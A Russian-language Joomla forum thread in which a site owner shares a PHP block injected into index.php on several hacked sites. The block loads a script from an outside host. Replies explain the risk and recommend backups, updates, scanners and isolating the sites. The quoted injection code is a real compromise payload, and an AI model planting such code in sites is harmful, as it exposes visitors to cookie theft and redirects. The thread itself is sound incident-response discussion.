Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1703 Просмотров
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Есть несколько сайтов на одном хостинге: один из них на Joomla 1.5, другие на Joomla 2.5.4
Произошел взлом какого-то сайта, наверное 1.5, в результате заражены были все сайты.
В файле index.php всех сайтов стоит блок:

Код
<?php
#033761#
if(empty($j)) {
$j = "<script type=\"text/javascript\" src=\"http://ghseif.us/manage/login/6fh1tz6y.php?id=12745\"></script>";
echo $j;
}
#/033761#
?>


если смотреть код сайта в HTML то там просто стоит скрипт в коде:

Код
<script type="text/javascript" src="http://ghseif.us/manage/login/6fh1tz6y.php?id=12745"></script>

Вопрос: в чем смысл этой ссылки в скрипте? она ведь не индексируется поисковиком... или может быть редирект при каких-то условиях..?

И решится проблема, если просто обновить сайты и убрать этот код из index.php?

И еще не совсем понятно ситуация: в корне сайта есть папки с датой изменения как и файла index.php, но в папках нет файлов этой даты, все файлы старые.. это тоже могло быть изменено при взломе?
« Последнее редактирование: 21.06.2015, 00:08:17 от ap11 »
*

zomby6888

  • Завсегдатай
  • 1473
  • 171 / 3
Re: Взломана Joomla, непонятный скрипт
« Ответ #1 : 21.06.2015, 00:19:23 »
Цитировать
Вопрос: в чем смысл этой ссылки в скрипте?

В том что произвольный код исполняется на страницах сайта. Он может что угодно делать, воровать пользовательские кукисы и данные,  или перенаправлять пользователей например.
интернет-блог: http://websiteprog.ru
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломана Joomla, непонятный скрипт
« Ответ #2 : 21.06.2015, 00:22:13 »
Проблема решается откатом сайтов из резервной копии и дальнейшим обновлением или поиском уязвимостей.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Взломана Joomla, непонятный скрипт
« Ответ #3 : 21.06.2015, 05:24:37 »
Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Взломана Joomla, непонятный скрипт
« Ответ #4 : 21.06.2015, 06:53:26 »
Кроме этого каждый сайт надо отделить от другого.
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Re: Взломана Joomla, непонятный скрипт
« Ответ #5 : 21.06.2015, 16:08:12 »
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломана Joomla, непонятный скрипт
« Ответ #6 : 21.06.2015, 19:57:10 »
Взлом ещё может быть от того, что вирус в вашем компьютере украл пароль от ftp
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломана Joomla, непонятный скрипт
« Ответ #7 : 22.06.2015, 07:26:40 »
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Конкретно встречался с уязвимостями на Ackeeba Backup, Fox Contact, RokGallery, здается мне если в сторону других капнуть, там тоже всплывет что нить...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63130
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 926
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1101
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 1366
Последний ответ 13.09.2021, 09:23:28
от Oleg+
Joomla 1.5 и 2.5 на одном хостинге

Автор andreU

Ответов: 28
Просмотров: 13105
Последний ответ 25.04.2021, 19:42:48
от rsn